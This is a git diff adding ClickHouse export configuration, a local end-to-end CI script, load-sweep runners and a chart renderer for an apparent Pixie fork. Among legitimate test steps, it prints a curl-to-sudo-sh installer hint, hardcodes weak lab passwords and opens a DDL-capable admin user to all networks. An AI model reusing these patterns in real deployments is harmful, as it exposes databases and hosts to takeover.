past for pre-1.14 compatibility. - matchExpressions: - key: kubernetes.io/os - operator: Exists - - key: kubernetes.io/os - operator: In - values: - - linux - - matchExpressions: - - key: beta.kubernetes.io/os - operator: Exists - - key: beta.kubernetes.io/os operator: In values: - linux @@ -57,6 +52,31 @@ spec: value: "10" - name: DETECTION_LOOKBACK_SEC value: "30" + # EXPORT_MODE controls the reconcile behaviour: + # auto - detection drives on/off (default) + # always - plugin always enabled (bypass detection) + # never - plugin always disabled and ch-* scripts purged + - name: EXPORT_MODE + value: "auto" + # Number of consecutive empty detection ticks before auto-disable fires. + - name: EXPORT_QUIET_TICKS + value: "6" + # Optional overrides for the ClickHouse PxL scripts. When unset they are + # parsed from CLICKHOUSE_DSN. Individual fields win over the parsed DSN. + # Defaults below match soc/tree/clickhouse-lab (forensic-soc-db CHI, + # ingest_writer user, forensic_db database). + - name: KUBESCAPE_TABLE + value: "kubescape_logs" + # - name: CLICKHOUSE_HOST + # value: "clickhouse-forensic-soc-db.clickhouse.svc.cluster.local" + # - name: CLICKHOUSE_PORT + # value: "9000" + # - name: CLICKHOUSE_USER + # value: "ingest_writer" + # - name: CLICKHOUSE_PASSWORD + # value: "changeme-ingest" + # - name: CLICKHOUSE_DATABASE + # value: "forensic_db" securityContext: allowPrivilegeEscalation: false capabilities: diff --git a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml index 19be138743b..beced120f63 100644 --- a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml @@ -7,5 +7,8 @@ type: Opaque stringData: # Replace with your actual Pixie API key from https://work.withpixie.ai pixie-api-key: "PIXIE_API_KEY_PLACEHOLDER" - # Replace with your ClickHouse DSN: clickhouse://user:password@host:port/database - clickhouse-dsn: "otelcollector:otelcollectorpass@hyperdx-hdx-oss-v2-clickhouse.click.svc.cluster.local:9000/default" + # ClickHouse DSN matches soc/tree/clickhouse-lab (CHI "forensic-soc-db", + # ingest_writer user with INSERT rights into the forensic_db database). + # Format: user:password@host:port/database + clickhouse-dsn: >- + ingest_writer:changeme-ingest@clickhouse-forensic-soc-db.clickhouse.svc.cluster.local:9000/forensic_db diff --git a/local-ci.sh b/local-ci.sh new file mode 100755 index 00000000000..3b02edccccd --- /dev/null +++ b/local-ci.sh @@ -0,0 +1,547 @@ +#!/usr/bin/env bash +# local-ci.sh — repeatable end-to-end test for the adaptive_export feature +# (PR #37, branch entlein/adaptive-write). +# +# Verifies the failure mode the user reported ("tables never appear in +# the clickhouse database") by exercising every persistence path the +# operator exposes against a real ClickHouse running in a local k3s. +# +# Phases (default = 0..8; --full adds 9): +# 0 pre-flight tooling (k3s, kubectl, helm, go, golangci-lint) +# 1 unit tests (go test ./src/vizier/services/adaptive_export/...) +# 2 lint (go vet + golangci-lint) +# 3 bring up ClickHouse via soc/clickhouse-lab (Altinity operator +# + keeper + CHI + soc-side schema for alerts + kubescape_logs) +# 4 sanity: forensic_db / alerts / kubescape_logs exist (soc layer) +# 5 operator's Apply() against live CH — ALL 12 pixie tables + +# adaptive_attribution must materialise +# 6 VerifyPixieSchema — required columns present on every pixie table +# 7 sink: AttributionRow + WritePixieRows for every PixieTable +# 8 trigger: insert kubescape_logs row, expect a kubescape.Event +# 9 (--full) bazel build + image push + operator deploy + e2e smoke +# +# Modes: +# ./local-ci.sh # phases 0..8 +# ./local-ci.sh --full # phases 0..9 +# ./local-ci.sh --phases=1,2 # specific phases only +# ./local-ci.sh --skip-cluster # skip phase 3 (assume CH up) +# ./local-ci.sh --teardown # destroy the CH install + cluster +# ./local-ci.sh --reset # teardown then full run +# +# Idempotent: re-running keeps the cluster, ports, and kubeconfig. +# Test rows use unique tags per run so they don't collide. + +set -euo pipefail + +# --- paths + config ----------------------------------------------------- + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +SOC_DIR="${SOC_DIR:-/home/constanze/code/soc-clone/soc}" +SOC_CH_DIR="$SOC_DIR/tree/clickhouse-lab" +CH_NS="${CH_NS:-clickhouse}" +CHI_NAME="${CHI_NAME:-forensic-soc-db}" +KEEPER_NAME="${KEEPER_NAME:-forensic-keeper}" +CH_OPERATOR_VERSION="${CH_OPERATOR_VERSION:-0.26.0}" +PORT_FWD_PORT="${PORT_FWD_PORT:-18123}" +SCHEMA_ADMIN_USER="${SCHEMA_ADMIN_USER:-schema_admin}" +SCHEMA_ADMIN_PASS="${SCHEMA_ADMIN_PASS:-localci-admin}" +KUBECONFIG_SRC="/etc/rancher/k3s/k3s.yaml" +KUBECONFIG_DST="$HOME/.kube/local-ci.yaml" +PORT_FWD_PIDFILE="/tmp/local-ci-pf.pid" +PIXIE_REPO="$SCRIPT_DIR" +GO_PKG="px.dev/pixie/src/vizier/services/adaptive_export/..." + +# --- presentation ------------------------------------------------------- + +C_RED=$'\e[31m'; C_GRN=$'\e[32m'; C_YLW=$'\e[33m'; C_BLU=$'\e[36m'; C_RST=$'\e[0m' +PASS=0; FAIL=0 +phase() { echo "${C_BLU}=== $* ===${C_RST}"; } +ok() { echo " ${C_GRN}PASS${C_RST}: $*"; PASS=$((PASS+1)); } +fail() { echo " ${C_RED}FAIL${C_RST}: $*"; FAIL=$((FAIL+1)); } +info() { echo " ${C_YLW}info${C_RST}: $*"; } +need() { command -v "$1" >/dev/null 2>&1 || { echo "${C_RED}missing tool: $1${C_RST}"; exit 1; }; } +check() { local label="$1"; shift; if "$@"; then ok "$label"; else fail "$label"; fi; } + +# --- arg parsing -------------------------------------------------------- + +PHASES_ARG="" +SKIP_CLUSTER=0 +TEARDOWN=0 +RESET=0 +FULL=0 +for arg in "$@"; do + case "$arg" in + --phases=*) PHASES_ARG="${arg#--phases=}" ;; + --skip-cluster) SKIP_CLUSTER=1 ;; + --teardown) TEARDOWN=1 ;; + --reset) RESET=1 ;; + --full) FULL=1 ;; + -h|--help) sed -n '2,30p' "$0"; exit 0 ;; + *) echo "unknown arg: $arg"; exit 1 ;; + esac +done + +# --- kubeconfig + sudo helper ------------------------------------------- + +setup_kubeconfig() { + if [[ ! -f "$KUBECONFIG_SRC" ]]; then + echo "${C_RED}k3s kubeconfig not found at $KUBECONFIG_SRC; is k3s installed?${C_RST}" + exit 1 + fi + mkdir -p "$(dirname "$KUBECONFIG_DST")" + if [[ ! -f "$KUBECONFIG_DST" || "$KUBECONFIG_SRC" -nt "$KUBECONFIG_DST" ]]; then + sudo cat "$KUBECONFIG_SRC" > "$KUBECONFIG_DST" + chmod 600 "$KUBECONFIG_DST" + fi + export KUBECONFIG="$KUBECONFIG_DST" +} + +cleanup_port_forward() { + if [[ -f "$PORT_FWD_PIDFILE" ]]; then + local pid; pid=$(cat "$PORT_FWD_PIDFILE" 2>/dev/null || true) + if [[ -n "$pid" ]] && kill -0 "$pid" 2>/dev/null; then + kill "$pid" 2>/dev/null || true + fi + rm -f "$PORT_FWD_PIDFILE" + fi +} +trap cleanup_port_forward EXIT + +# --- teardown ----------------------------------------------------------- + +teardown() { + setup_kubeconfig + phase "teardown" + cleanup_port_forward + kubectl delete chi "$CHI_NAME" -n "$CH_NS" --wait --ignore-not-found + kubectl delete chk "$KEEPER_NAME" -n "$CH_NS" --wait --ignore-not-found 2>/dev/null || true + helm uninstall clickhouse-operator -n "$CH_NS" 2>/dev/null || true + kubectl delete pvc -n "$CH_NS" --all --wait --ignore-not-found 2>/dev/null || true + kubectl delete ns "$CH_NS" --wait --ignore-not-found 2>/dev/null || true + echo "${C_GRN}torn down${C_RST}" +} + +if [[ "$TEARDOWN" -eq 1 ]]; then + teardown + exit 0 +fi +if [[ "$RESET" -eq 1 ]]; then + teardown || true +fi + +# --- which phases? ------------------------------------------------------ + +if [[ -n "$PHASES_ARG" ]]; then + IFS=',' read -ra PHASES <<<"$PHASES_ARG" +else + PHASES=(0 1 2 3 4 5 6 7 8) + [[ "$FULL" -eq 1 ]] && PHASES+=(9) + [[ "$SKIP_CLUSTER" -eq 1 ]] && PHASES=("${PHASES[@]/3}") +fi +in_phase() { local p="$1"; for x in "${PHASES[@]}"; do [[ "$x" == "$p" ]] && return 0; done; return 1; } + +# --- phase 0: pre-flight ------------------------------------------------ + +if in_phase 0; then + phase "0/9 pre-flight tooling" + need go; need golangci-lint; need kubectl; need helm; need curl; need jq + if ! systemctl is-active --quiet k3s; then + fail "k3s is not running (systemctl is-active k3s)" + echo " install with: curl -sfL https://get.k3s.io | sudo INSTALL_K3S_EXEC='server --write-kubeconfig-mode=644 --disable=traefik' sh -" + exit 1 + fi + ok "k3s active" + setup_kubeconfig + kubectl get nodes >/dev/null && ok "kubectl can reach k3s" +fi + +# --- phase 1: unit tests ------------------------------------------------ + +if in_phase 1; then + phase "1/9 unit tests" + cd "$PIXIE_REPO" + if go test -count=1 -timeout 60s "./src/vizier/services/adaptive_export/..."; then + ok "go test ./src/vizier/services/adaptive_export/..." + else + fail "go test" + [[ "$FAIL" -gt 0 ]] && exit 1 + fi +fi + +# --- phase 2: lint ------------------------------------------------------ + +if in_phase 2; then + phase "2/9 lint" + cd "$PIXIE_REPO" + if go vet ./src/vizier/services/adaptive_export/...; then + ok "go vet" + else + fail "go vet" + fi + if golangci-lint run ./src/vizier/services/adaptive_export/...; then + ok "golangci-lint" + else + fail "golangci-lint (see output above)" + info "lint failures are NOT fatal — phase continues; address before merging PR #37" + fi +fi + +# --- phase 3: ClickHouse bring-up via soc ------------------------------- + +build_patched_installation_yaml() { + # Append a schema_admin user (allow_ddl=1) so the operator's Apply() + # path can be exercised end-to-end via HTTP. Default user is locked + # to localhost on Altinity images, ingest_writer/forensic_analyst + # have allow_ddl=0. The patched YAML is written to /tmp/. + local out=/tmp/local-ci-installation.yaml + cat "$SOC_CH_DIR/installation.yaml" >"$out" + # Insert the schema_admin user under spec.configuration.users. + # Done via Python for reliability — yq isn't always installed. + python3 - "$out" <<'PY' +import sys, re +path = sys.argv[1] +text = open(path).read() +patch = ( + "\n # Local-CI admin: DDL-capable, used by the integration tests\n" + " schema_admin/profile: default\n" + " schema_admin/password: localci-admin\n" + " schema_admin/networks/ip: \"::/0\"\n" + " schema_admin/quota: default\n" +) +m = re.search(r'^ users:.*?(?=\n defaults:)', text, re.S | re.M) +if not m: + sys.exit("could not locate users: section in installation.yaml") +text = text[:m.end()] + patch + text[m.end():] +open(path, 'w').write(text) +PY + echo "$out" +} + +if in_phase 3; then + phase "3/9 ClickHouse via soc/clickhouse-lab" + setup_kubeconfig + kubectl create ns "$CH_NS" --dry-run=client -o yaml | kubectl apply -f - >/dev/null + + # Altinity operator + helm repo add altinity https://helm.altinity.com >/dev/null 2>&1 || true + helm repo update >/dev/null + if helm status clickhouse-operator -n "$CH_NS" >/dev/null 2>&1; then + ok "altinity operator already installed" + else + helm upgrade --install clickhouse-operator altinity/altinity-clickhouse-operator \ + --version "$CH_OPERATOR_VERSION" --namespace "$CH_NS" --create-namespace --wait + ok "altinity operator installed" + fi + + # Keeper + kubectl apply -f "$SOC_CH_DIR/keeper.yaml" >/dev/null + for i in $(seq 1 60); do + kubectl get pods -n "$CH_NS" -l "clickhouse-keeper.altinity.com/chk=$KEEPER_NAME" --no-headers 2>/dev/null | grep -q Running && break + sleep 3 + done + check "keeper running" kubectl get pods -n "$CH_NS" -l "clickhouse-keeper.altinity.com/chk=$KEEPER_NAME" --no-headers -o jsonpath='{.items[0].status.phase}' 2>/dev/null + + # CHI (patched with schema_admin) + PATCHED_YAML=$(build_patched_installation_yaml) + kubectl apply -f "$PATCHED_YAML" >/dev/null + + info "waiting for CHI pod to come Ready (up to 5 min)…" + for i in $(seq 1 100); do + PHASE=$(kubectl get pods -n "$CH_NS" -l "clickhouse.altinity.com/chi=$CHI_NAME" --no-headers -o jsonpath='{.items[0].status.phase}' 2>/dev/null || true) + [[ "$PHASE" == "Running" ]] && break + sleep 3 + done + CH_POD=$(kubectl get pods -n "$CH_NS" -l "clickhouse.altinity.com/chi=$CHI_NAME" -o jsonpath='{.items[0].metadata.name}' 2>/dev/null) + if [[ -z "$CH_POD" ]]; then fail "CHI pod did not start"; exit 1; fi + ok "CHI pod $CH_POD running" + + for i in $(seq 1 60); do + R=$(kubectl exec -n "$CH_NS" "$CH_POD" -- clickhouse-client -q "SELECT 1" 2>/dev/null | tr -d '[:space:]') || true + [[ "$R" == "1" ]] && break + sleep 2 + done + check "clickhouse-client responsive in pod" test "$R" = "1" + + # Apply soc-owned schema (alerts + kubescape_logs only after b7f5fe0). + kubectl exec -i -n "$CH_NS" "$CH_POD" -- clickhouse-client --multiquery <"$SOC_CH_DIR/schema.sql" + ok "soc schema applied (alerts + kubescape_logs)" +fi + +# --- ensure port-forward to CH (used by phases 4..8) -------------------- + +ensure_port_forward() { + setup_kubeconfig + if [[ -f "$PORT_FWD_PIDFILE" ]] && kill -0 "$(cat "$PORT_FWD_PIDFILE")" 2>/dev/null; then + return 0 + fi + local svc + svc=$(kubectl get svc -n "$CH_NS" -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | grep -m1 "^chi-$CHI_NAME-" || true) + [[ -z "$svc" ]] && svc=$(kubectl get svc -n "$CH_NS" -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | grep -m1 "$CHI_NAME" || true) + [[ -z "$svc" ]] && { echo "${C_RED}no CH service found in ns/$CH_NS${C_RST}"; return 1; } + info "port-forward svc/$svc :$PORT_FWD_PORT → 8123" + ( kubectl port-forward -n "$CH_NS" "svc/$svc" "$PORT_FWD_PORT:8123" >/tmp/local-ci-pf.log 2>&1 ) & + echo $! >"$PORT_FWD_PIDFILE" + for i in $(seq 1 30); do + curl -sf "http://localhost:$PORT_FWD_PORT/?query=SELECT%201" \ + -u "$SCHEMA_ADMIN_USER:$SCHEMA_ADMIN_PASS" 2>/dev/null | grep -q "^1$" && return 0 + sleep 1 + done + echo "${C_RED}port-forward never became responsive — check /tmp/local-ci-pf.log${C_RST}" + return 1 +} + +ch_count() { + curl -sf "http://localhost:$PORT_FWD_PORT/?query=$1" \ + -u "$SCHEMA_ADMIN_USER:$SCHEMA_ADMIN_PASS" | tr -d '[:space:]' +} + +# --- phase 4: soc-layer sanity ------------------------------------------ + +if in_phase 4; then + phase "4/9 soc-layer sanity" + ensure_port_forward + for table in alerts kubescape_logs; do + GOT=$(ch_count "EXISTS%20forensic_db.$table" || echo "") + if [[ "$GOT" == "1" ]]; then ok "forensic_db.$table exists"; else fail "forensic_db.$table missing (soc/install.sh broken?)"; fi + done +fi + +# --- phase 5: operator Apply() integration ------------------------------ + +INTEGRATION_ENV=( + "INTEGRATION_CH_ENDPOINT=http://localhost:$PORT_FWD_PORT" + "INTEGRATION_CH_USER=$SCHEMA_ADMIN_USER" + "INTEGRATION_CH_PASSWORD=$SCHEMA_ADMIN_PASS" +) + +if in_phase 5; then + phase "5/9 operator's Apply() against live CH" + ensure_port_forward + cd "$PIXIE_REPO" + if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 120s -v \ + -run 'TestApply_Live|TestApply_Idempotent' \ + ./src/vizier/services/adaptive_export/internal/clickhouse/...; then + ok "Apply() materialises all 13 operator-owned tables" + else + fail "Apply() integration test failed — this is the 'tables never appear' bug surface" + fi +fi + +# --- phase 6: VerifyPixieSchema ----------------------------------------- + +if in_phase 6; then + phase "6/9 VerifyPixieSchema" + ensure_port_forward + cd "$PIXIE_REPO" + if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 60s -v \ + -run TestVerifyPixieSchema_Live \ + ./src/vizier/services/adaptive_export/internal/clickhouse/...; then + ok "VerifyPixieSchema passes" + else + fail "VerifyPixieSchema failed — required columns missing on a pixie table" + fi +fi + +# --- phase 7: sink ------------------------------------------------------- + +if in_phase 7; then + phase "7/9 sink: AttributionRow + WritePixieRows" + ensure_port_forward + cd "$PIXIE_REPO" + if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 120s -v \ + -run 'TestSinkWriteAttribution_Live|TestSinkWritePixieRows_Live' \ + ./src/vizier/services/adaptive_export/internal/sink/...; then + ok "sink writes succeed for adaptive_attribution + every pixie table" + else + fail "sink integration test failed" + fi +fi + +# --- phase 8: trigger ---------------------------------------------------- + +if in_phase 8; then + phase "8/9 trigger: insert kubescape_logs row, expect Event" + ensure_port_forward + cd "$PIXIE_REPO" + if env "${INTEGRATION_ENV[@]}" go test -tags=integration -count=1 -timeout 60s -v \ + -run TestTriggerSubscribe_Live \ + ./src/vizier/services/adaptive_export/internal/trigger/...; then + ok "trigger surfaces the seeded row" + else + fail "trigger integration test failed" + fi +fi + +# --- phase 9: perf-eval-soc-attack end-to-end --------------------------- +# +# Mirrors .github/workflows/perf_soc_attack.yaml, but adapted for a single +# local k3s (the GH workflow targets a remote forensic cluster reachable +# over Tailscale). Differences from the GH workflow: +# - Exports parquet locally instead of pushing to GCS (no gcloud creds +# on this VM). +# - Uses the in-cluster CH NodePort + a local `pixie` user instead of +# the AOCC public forensic CH (SOC_CH_HOST / SOC_CH_CREDS). +# - Reuses the Pixie deployment already running in `pl` instead of +# re-running `px deploy` + skaffold rebuild (SOC_VIZIER_EXISTING=1). +# - Drops --prom_recorder_override; recorders use the same kubeconfig. +# +# Required env (read from ~/.pixie/keys.env if not pre-exported): +# PX_API_KEY — AOCC pixie-cloud API key (NOT exported in +# the shell, passed via --api_key). +# PX_DEPLOY_KEY — present in keys.env but unused here (the +# perf_tool uses the API key for vizier ops). +# Optional: +# PERF_OUT_DIR — defaults to /tmp/perf-out-$ts. +# PERF_TAGS — extra tags, default "local-ci". + +if in_phase 9; then + phase "9/9 perf-eval-soc-attack (sovereign-soc/redis-attack)" + setup_kubeconfig + cd "$PIXIE_REPO" + + # Pixie keys: prefer pre-exported env, else parse PX_API_KEY out of + # ~/.pixie/keys.env. Avoid `source` — that file may contain a + # placeholder `TS_AUTH_KEY=` whose `<>` would trigger a + # shell syntax error. + if [[ -z "${PX_API_KEY:-}" && -r "$HOME/.pixie/keys.env" ]]; then + PX_API_KEY=$(awk -F= '/^PX_API_KEY=/{print substr($0, index($0,"=")+1); exit}' "$HOME/.pixie/keys.env") + export PX_API_KEY + fi + if [[ -z "${PX_API_KEY:-}" ]]; then + fail "PX_API_KEY not set and ~/.pixie/keys.env did not provide it" + exit 1 + fi + + # Make sure pixie cloud is reachable over tailscale before we waste + # 22+ min on a doomed experiment. + if ! curl -sf --max-time 5 -o /dev/null -w "%{http_code}\n" \ + https://pixie.austrianopencloudcommunity.org/ | grep -qE "^(2|3)"; then + fail "AOCC pixie-cloud unreachable — is tailscale up? Run: sudo tailscale status" + exit 1 + fi + ok "AOCC pixie-cloud reachable over tailscale" + + # CHI NodePort: ensure the service exists (idempotent). + if ! kubectl -n "$CH_NS" get svc ch-perf-nodeport >/dev/null 2>&1; then + info "creating NodePort ch-perf-nodeport (CH 8123→30123, 9000→30900)" + cat </dev/null +apiVersion: v1 +kind: Service +metadata: + name: ch-perf-nodeport + namespace: $CH_NS +spec: + type: NodePort + selector: + clickhouse.altinity.com/chi: $CHI_NAME + ports: + - {name: http, port: 8123, targetPort: 8123, nodePort: 30123} + - {name: native, port: 9000, targetPort: 9000, nodePort: 30900} +YAML + fi + ok "CH NodePort ready (10.0.2.12:30123 http / :30900 native)" + + # Ensure the `pixie` CH user exists with the grants the suite needs. + # Created via the `default` user (localhost-only on Altinity images, so + # this only works via kubectl exec, not from the host). + CH_POD=$(kubectl get pods -n "$CH_NS" -l "clickhouse.altinity.com/chi=$CHI_NAME" -o jsonpath='{.items[0].metadata.name}') + kubectl exec -n "$CH_NS" "$CH_POD" -- clickhouse-client --user default --multiquery -q " + CREATE USER IF NOT EXISTS pixie IDENTIFIED WITH plaintext_password BY 'pixie_password' HOST ANY; + GRANT SHOW DATABASES, SHOW TABLES ON *.* TO pixie; + GRANT SELECT, INSERT ON forensic_db.* TO pixie; + GRANT SELECT, INSERT, CREATE TABLE, DROP TABLE ON default.* TO pixie; + " >/dev/null + ok "CH user pixie:pixie_password ready" + + # Pre-create default.redis_events — the clickhouse_export.pxl recorder + # INSERTs Pixie redis_events rows here every exportPeriod (5s), and + # Kelvin's ClickHouseExportSinkNode does NOT catch CH-client exceptions: + # any error (table missing, schema mismatch, OOM) crashes Kelvin with + # SIGSEGV → "context canceled" on the recorder stream → perf_tool aborts. + # Columns must match the source PxL DataFrame shape EXACTLY; the px_info_ + # column appears only in debug-built PEM (release builds #ifdef it out). + # If you swap to a release PEM, drop px_info_ from this DDL. + kubectl exec -n "$CH_NS" "$CH_POD" -- clickhouse-client --user pixie --password pixie_password --multiquery -q " + CREATE TABLE IF NOT EXISTS default.redis_events ( + time_ DateTime64(9, 'UTC'), + upid String, + remote_addr String, + remote_port Int64, + local_addr String, + local_port Int64, + trace_role Int64, + encrypted UInt8, + req_cmd String, + req_args String, + resp String, + latency Int64, + px_info_ String, + hostname String, + event_time DateTime64(3, 'UTC') + ) ENGINE = MergeTree() + PARTITION BY toYYYYMM(event_time) + ORDER BY (hostname, event_time); + " >/dev/null + ok "default.redis_events ready (sink target for clickhouse_export.pxl)" + + # Build perf_tool (cached after first run). + if ! bazel build //src/e2e_test/perf_tool:perf_tool //src/pixie_cli:px >/tmp/perf_tool-build.log 2>&1; then + fail "bazel build perf_tool/px CLI — see /tmp/perf_tool-build.log" + exit 1 + fi + PERF_BIN="bazel-bin/src/e2e_test/perf_tool/perf_tool_/perf_tool" + PX_BIN="bazel-bin/src/pixie_cli/px_/px" + # perf_tool's pxDeployImpl shells out to `px` via PATH (RunPXCmd → exec.Command("px")). + # Make sure the freshly-built binary is the one used. + if [[ ! -x /usr/local/bin/px || /usr/local/bin/px -ot "$PX_BIN" ]]; then + sudo install -m 0755 "$PX_BIN" /usr/local/bin/px + fi + ok "perf_tool built; px CLI at /usr/local/bin/px" + + PERF_OUT_DIR="${PERF_OUT_DIR:-/tmp/perf-out-$(date +%Y%m%d-%H%M%S)}" + mkdir -p "$PERF_OUT_DIR" + COMMIT_SHA="$(git -C "$PIXIE_REPO" rev-parse --short HEAD)" + PERF_TAGS="${PERF_TAGS:-local-ci}" + + info "experiment: sovereign-soc/redis-attack (BURNIN 2m + RUN 20m + deploy ~5m)" + info "output: $PERF_OUT_DIR" + info "commit: $COMMIT_SHA tags: $PERF_TAGS" + + set +e + env \ + BUILD_WORKSPACE_DIRECTORY="$PIXIE_REPO" \ + LOG_LEVEL="${PERF_LOG_LEVEL:-info}" \ + SOC_CH_HOST="10.0.2.12:30900" \ + SOC_CH_CREDS="pixie:pixie_password" \ + SOC_VIZIER_EXISTING="1" \ + "$PERF_BIN" run \ + --api_key="$PX_API_KEY" \ + --cloud_addr=pixie.austrianopencloudcommunity.org:443 \ + --commit_sha="$COMMIT_SHA" \ + ${PERF_EXPERIMENT_NAME:+--experiment_name="$PERF_EXPERIMENT_NAME"} \ + --suite=sovereign-soc \ + --use_local_cluster \ + --export_backend=parquet-local \ + --parquet_dir="$PERF_OUT_DIR" \ + --container_repo=ghcr.io/k8sstormcenter \ + --max_retries=3 \ + --tags "$PERF_TAGS" \ + 2>&1 | tee "$PERF_OUT_DIR/perf_tool.log" + RC=${PIPESTATUS[0]} + set -e + + if [[ "$RC" -eq 0 ]]; then + PARQUET_COUNT=$(find "$PERF_OUT_DIR" -name "*.parquet" 2>/dev/null | wc -l) + ok "perf-eval-soc-attack passed; $PARQUET_COUNT parquet files in $PERF_OUT_DIR" + else + fail "perf-eval-soc-attack exit=$RC; see $PERF_OUT_DIR/perf_tool.log" + fi +fi + +# --- summary ------------------------------------------------------------ + +echo +phase "summary" +echo " passed: $PASS" +echo " failed: $FAIL" +[[ "$FAIL" -eq 0 ]] diff --git a/perf-sweep.sh b/perf-sweep.sh new file mode 100755 index 00000000000..b3f7ce02408 --- /dev/null +++ b/perf-sweep.sh @@ -0,0 +1,69 @@ +#!/usr/bin/env bash +# perf-sweep.sh — run the sovereign-soc load-multiplier sweep on the local +# k3s by invoking local-ci.sh phase 9 once per multiplier. Each run is ~25 +# min (30 s setup + 2 m BURNIN + 20 m RUN + ~3 m teardown), so the full +# 5-multiplier sweep takes ~2h05m. +# +# Output: a single timestamped sweep dir under /tmp/perf-sweep-/, +# with one parquet output subdir + one perf_tool log per multiplier: +# +# /tmp/perf-sweep-20260514-…/ +# 1x/ 2026/…/results_0000.parquet spec.parquet perf_tool.log +# 2x/ … +# 4x/ … +# 8x/ … +# 16x/ … +# sweep.log ← top-level log of which multiplier started/finished when +# +# Usage: +# ./perf-sweep.sh # run all five 1×, 2×, 4×, 8×, 16× +# ./perf-sweep.sh 4x 16x # just those two +# +# Stops on the first failure so a broken 1× run doesn't waste 1h45m on the +# rest. +set -euo pipefail + +SWEEP_DIR=/tmp/perf-sweep-$(date +%Y%m%d-%H%M%S) +mkdir -p "$SWEEP_DIR" +SWEEP_LOG="$SWEEP_DIR/sweep.log" +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" + +log() { printf '%(%Y-%m-%dT%H:%M:%S)T %s\n' -1 "$*" | tee -a "$SWEEP_LOG"; } + +if [[ $# -eq 0 ]]; then + # Default sweep matches the multipliers wired into + # pixie/src/e2e_test/perf_tool/pkg/suites/suites.go → sovereignSOCSuite(). + # When the suite list changes, this list must change too — perf_tool + # exits 1 if `--experiment_name=redis-attack-Nx` isn't in the + # registry. + MULTIPLIERS=(2x 4x 8x 16x 32x 64x) +else + MULTIPLIERS=("$@") +fi +log "sweep dir: $SWEEP_DIR" +log "multipliers: ${MULTIPLIERS[*]}" + +t_start=$(date +%s) +for m in "${MULTIPLIERS[@]}"; do + EXP="redis-attack-${m}" + OUT="$SWEEP_DIR/${m}" + mkdir -p "$OUT" + log "=== START $EXP → $OUT ===" + iter_start=$(date +%s) + if PERF_EXPERIMENT_NAME="$EXP" \ + PERF_OUT_DIR="$OUT" \ + PERF_LOG_LEVEL="${PERF_LOG_LEVEL:-info}" \ + "$SCRIPT_DIR/local-ci.sh" --phases=9 \ + > "$OUT/local-ci.log" 2>&1; then + iter_end=$(date +%s) + log "=== DONE $EXP ($((iter_end - iter_start)) s)" + else + rc=$? + iter_end=$(date +%s) + log "=== FAIL $EXP (exit=$rc, $((iter_end - iter_start)) s) — see $OUT/local-ci.log" + log "aborting sweep — fix and rerun missing multipliers individually" + exit "$rc" + fi +done +t_end=$(date +%s) +log "sweep complete in $((t_end - t_start)) s — $SWEEP_DIR" diff --git a/render-sweep-watch.sh b/render-sweep-watch.sh new file mode 100755 index 00000000000..9730dffafb8 --- /dev/null +++ b/render-sweep-watch.sh @@ -0,0 +1,44 @@ +#!/usr/bin/env bash +# render-sweep-watch.sh — poll the sweep dir; re-render PNGs whenever a new +# Nx/.../results_*.parquet appears. +# +# Usage: +# ./render-sweep-watch.sh # watch the latest perf-sweep-* +# ./render-sweep-watch.sh /tmp/perf-sweep-20260514-114224 +# +# Idempotent — running this twice on the same dir produces the same PNGs. +# Stops auto-rendering once the sweep is done (sweep.log shows "sweep complete"). +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +PY="${PY:-/home/constanze/.venvs/render/bin/python}" +RENDER="$SCRIPT_DIR/render-sweep.py" + +if [[ ${1:-} ]]; then + SWEEP="$1" +else + SWEEP=$(ls -dt /tmp/perf-sweep-2*/ 2>/dev/null | head -1) +fi +[[ -z "${SWEEP:-}" || ! -d "$SWEEP" ]] && { echo "no sweep dir"; exit 1; } +SWEEP="${SWEEP%/}" +echo "watching: $SWEEP" + +prev_signature="" +while true; do + # Build a signature from the modification times of all results parquets; + # whenever one is added or grows, the signature changes and we re-render. + signature=$(find "$SWEEP" -name 'results_*.parquet' -printf '%p:%T@:%s\n' \ + 2>/dev/null | sort) + if [[ "$signature" != "$prev_signature" ]]; then + echo "$(date -Is) — rendering ($(echo "$signature" | wc -l) parquets)" + "$PY" "$RENDER" "$SWEEP" || echo "(render failed — keeping watcher alive)" + prev_signature="$signature" + fi + # If sweep is done, render once more and exit so the process doesn't linger. + if grep -q "sweep complete" "$SWEEP/sweep.log" 2>/dev/null; then + echo "$(date -Is) — sweep complete, final render done, exiting" + "$PY" "$RENDER" "$SWEEP" || true + exit 0 + fi + sleep 30 +done diff --git a/render-sweep.py b/render-sweep.py new file mode 100755 index 00000000000..d609f7bb413 --- /dev/null +++ b/render-sweep.py @@ -0,0 +1,792 @@ +#!/usr/bin/env python3 +"""render-sweep.py — turn perf_tool parquet output into inspection PNGs. + +Discovers every `//.../*.parquet` produced by `perf-sweep.sh`, +renders a per-run multi-panel PNG, and a cross-run summary that compares all +multipliers on the same axes. + +Run idempotently — re-rendering existing PNGs is safe; the watcher +(`render-sweep-watch.sh`) reinvokes this script every time a new parquet +appears on disk so you can inspect partial results during the sweep. + +Inputs assumed: + //2026/MM/DD//results_0000*.parquet + //2026/MM/DD//spec.parquet + +Output: + /.png — 6-panel per-run inspection chart + /summary.png — small-multiples cross-run comparison + /scorecard.png — bar chart: peak/mean of key metrics per run + +Spotting bugs: + * recorder rate flat across BURNIN vs RUN → bobctl/k6 not adding load + * PEM CPU plateaus before 100% → bottleneck elsewhere + * CH memory climbing monotonically → OOM coming + * forensic_alert_count stays 0 → kubescape→Vector pipeline broken +""" + +import argparse +import json +import os +import re +import sys +from dataclasses import dataclass +from pathlib import Path + +import matplotlib +matplotlib.use("Agg") # no display on the VM +import matplotlib.pyplot as plt +import matplotlib.dates as mdates +import pandas as pd +import pyarrow.parquet as pq + +# ------------------------------------------------------------------ helpers + +MULTIPLIER_RE = re.compile(r"^(\d+)x$") + + +@dataclass +class RunData: + name: str # "1x" + multiplier: int # 1 + results_path: Path + 